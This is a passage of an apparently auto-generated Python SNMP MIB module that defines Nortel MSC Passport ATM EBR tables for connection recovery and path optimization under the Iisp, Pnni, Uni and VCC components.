mscAtmIfVptIispEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmIispMIB", "mscAtmIfVptIispIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptIispEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptIispEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfVptIispEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1, 1, 1), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrRowStatus.setStatus('mandatory')
mscAtmIfVptIispEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrComponentName.setStatus('mandatory')
mscAtmIfVptIispEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrStorageType.setStatus('mandatory')
mscAtmIfVptIispEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfVptIispEbrIndex.setStatus('mandatory')
mscAtmIfVptIispEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 20), )
if mibBuilder.loadTexts: mscAtmIfVptIispEbrProvTable.setStatus('mandatory')
# --- mscAtmIfVptIispEbr: EBR (Extended Bridging/Recovery) component under AtmIf/Vpt/Iisp ---
# NOTE(review): this file appears to be pysmi-generated from the Nortel
# Nortel-MsCarrier-MscPassport-AtmEbrMIB; do not hand-edit OID tuples —
# regenerate from the MIB instead.
# Provisioning entry, indexed by AtmIf / Vpt / Iisp / Ebr indices.
mscAtmIfVptIispEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 20, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmIispMIB", "mscAtmIfVptIispIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptIispEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptIispEbrProvEntry.setStatus('mandatory')
# Read-write 1-byte bitmask columns (default hex c0) controlling connection
# recovery and path optimization subscription.
mscAtmIfVptIispEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfVptIispEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrPathOptimization.setStatus('mandatory')
# Operational table (branch ...30): read-only gauges for subscribed /
# eligible-recovered / ineligible-recovered connection counts.
mscAtmIfVptIispEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30), )
if mibBuilder.loadTexts: mscAtmIfVptIispEbrOperTable.setStatus('mandatory')
mscAtmIfVptIispEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmIispMIB", "mscAtmIfVptIispIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptIispEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptIispEbrOperEntry.setStatus('mandatory')
mscAtmIfVptIispEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfVptIispEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfVptIispEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrIneligibleRecoveredConnections.setStatus('mandatory')
# Statistics table (branch ...40): read-only counters of total recoveries /
# path optimizations performed.
mscAtmIfVptIispEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 40), )
if mibBuilder.loadTexts: mscAtmIfVptIispEbrStatsTable.setStatus('mandatory')
mscAtmIfVptIispEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 40, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmIispMIB", "mscAtmIfVptIispIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptIispEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptIispEbrStatsEntry.setStatus('mandatory')
mscAtmIfVptIispEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 40, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfVptIispEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 40, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrTotalPathOptimizations.setStatus('mandatory')
# --- mscAtmIfVptPnniEbr: EBR component under AtmIf/Vpt/Pnni ---
# Same generated layout as the Iisp variant above, rooted at ...114, 9, 7, 7:
# RowStatus table (1), Prov table (20), Oper table (30), Stats table (40).
mscAtmIfVptPnniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7))
# RowStatus table: row creation/deletion plus component name, storage type
# and the non-replicated Ebr index column.
mscAtmIfVptPnniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1), )
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrRowStatusTable.setStatus('mandatory')
mscAtmIfVptPnniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmPnniMIB", "mscAtmIfVptPnniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptPnniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfVptPnniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1, 1, 1), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrRowStatus.setStatus('mandatory')
mscAtmIfVptPnniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrComponentName.setStatus('mandatory')
mscAtmIfVptPnniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrStorageType.setStatus('mandatory')
mscAtmIfVptPnniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrIndex.setStatus('mandatory')
# Provisioning table: read-write recovery / path-optimization bitmasks.
mscAtmIfVptPnniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 20), )
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrProvTable.setStatus('mandatory')
mscAtmIfVptPnniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 20, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmPnniMIB", "mscAtmIfVptPnniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptPnniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrProvEntry.setStatus('mandatory')
mscAtmIfVptPnniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfVptPnniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrPathOptimization.setStatus('mandatory')
# Operational table: read-only connection gauges.
mscAtmIfVptPnniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30), )
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrOperTable.setStatus('mandatory')
mscAtmIfVptPnniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmPnniMIB", "mscAtmIfVptPnniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptPnniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrOperEntry.setStatus('mandatory')
mscAtmIfVptPnniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfVptPnniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfVptPnniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrIneligibleRecoveredConnections.setStatus('mandatory')
# Statistics table: read-only lifetime counters.
mscAtmIfVptPnniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 40), )
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrStatsTable.setStatus('mandatory')
mscAtmIfVptPnniEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 40, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmPnniMIB", "mscAtmIfVptPnniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptPnniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrStatsEntry.setStatus('mandatory')
mscAtmIfVptPnniEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 40, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfVptPnniEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 40, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrTotalPathOptimizations.setStatus('mandatory')
# --- mscAtmIfVptUniEbr: EBR component under AtmIf/Vpt/Uni ---
# Same generated layout as the Iisp/Pnni variants, rooted at ...114, 9, 8, 7:
# RowStatus table (1), Prov table (20), Oper table (30), Stats table (40).
mscAtmIfVptUniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7))
# RowStatus table: row lifecycle plus name / storage-type / index columns.
mscAtmIfVptUniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1), )
if mibBuilder.loadTexts: mscAtmIfVptUniEbrRowStatusTable.setStatus('mandatory')
mscAtmIfVptUniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmUniMIB", "mscAtmIfVptUniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptUniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptUniEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfVptUniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1, 1, 1), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrRowStatus.setStatus('mandatory')
mscAtmIfVptUniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrComponentName.setStatus('mandatory')
mscAtmIfVptUniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrStorageType.setStatus('mandatory')
mscAtmIfVptUniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfVptUniEbrIndex.setStatus('mandatory')
# Provisioning table: read-write recovery / path-optimization bitmasks.
mscAtmIfVptUniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 20), )
if mibBuilder.loadTexts: mscAtmIfVptUniEbrProvTable.setStatus('mandatory')
mscAtmIfVptUniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 20, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmUniMIB", "mscAtmIfVptUniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptUniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptUniEbrProvEntry.setStatus('mandatory')
mscAtmIfVptUniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfVptUniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrPathOptimization.setStatus('mandatory')
# Operational table: read-only connection gauges.
mscAtmIfVptUniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30), )
if mibBuilder.loadTexts: mscAtmIfVptUniEbrOperTable.setStatus('mandatory')
mscAtmIfVptUniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmUniMIB", "mscAtmIfVptUniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptUniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptUniEbrOperEntry.setStatus('mandatory')
mscAtmIfVptUniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfVptUniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfVptUniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrIneligibleRecoveredConnections.setStatus('mandatory')
# Statistics table: read-only lifetime counters.
mscAtmIfVptUniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 40), )
if mibBuilder.loadTexts: mscAtmIfVptUniEbrStatsTable.setStatus('mandatory')
mscAtmIfVptUniEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 40, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmUniMIB", "mscAtmIfVptUniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptUniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptUniEbrStatsEntry.setStatus('mandatory')
mscAtmIfVptUniEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 40, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfVptUniEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 8, 7, 40, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptUniEbrTotalPathOptimizations.setStatus('mandatory')
# --- mscAtmIfVptVccSrcEbrOv: per-VCC-source EBR override under AtmIf/Vpt/Vcc/Src ---
# Rooted at ...114, 9, 20, 8, 2. Indexed one level deeper than the subtrees
# above (adds VccIndex and SrcIndex). RowStatus table (1), Prov table (20).
mscAtmIfVptVccSrcEbrOv = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2))
mscAtmIfVptVccSrcEbrOvRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1), )
if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvRowStatusTable.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmNetworkingMIB", "mscAtmIfVptVccSrcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptVccSrcEbrOvIndex"))
if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvRowStatusEntry.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1, 1, 1), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvRowStatus.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvComponentName.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvStorageType.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvIndex.setStatus('mandatory')
# Provisioning table: read-write no(0)/yes(1) enums, both defaulting to 'yes'.
mscAtmIfVptVccSrcEbrOvProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 20), )
if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvProvTable.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 20, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmNetworkingMIB", "mscAtmIfVptVccSrcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptVccSrcEbrOvIndex"))
if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvProvEntry.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 20, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1))).clone('yes')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvRecoverySubscribed.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 20, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1))).clone('yes')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvOptimizationSubscribed.setStatus('mandatory')
# --- mscAtmIfVptVccEbrInfo: read-only EBR status per AtmIf/Vpt/Vcc ---
# Rooted at ...114, 9, 20, 12. Unlike the Ov subtree above, even RowStatus is
# read-only here: RowStatus table (1), Oper table (30), Stats table (40) —
# no provisioning table.
mscAtmIfVptVccEbrInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12))
mscAtmIfVptVccEbrInfoRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1), )
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoRowStatusTable.setStatus('mandatory')
mscAtmIfVptVccEbrInfoRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptVccEbrInfoIndex"))
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoRowStatusEntry.setStatus('mandatory')
mscAtmIfVptVccEbrInfoRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1, 1, 1), RowStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoRowStatus.setStatus('mandatory')
mscAtmIfVptVccEbrInfoComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoComponentName.setStatus('mandatory')
mscAtmIfVptVccEbrInfoStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoStorageType.setStatus('mandatory')
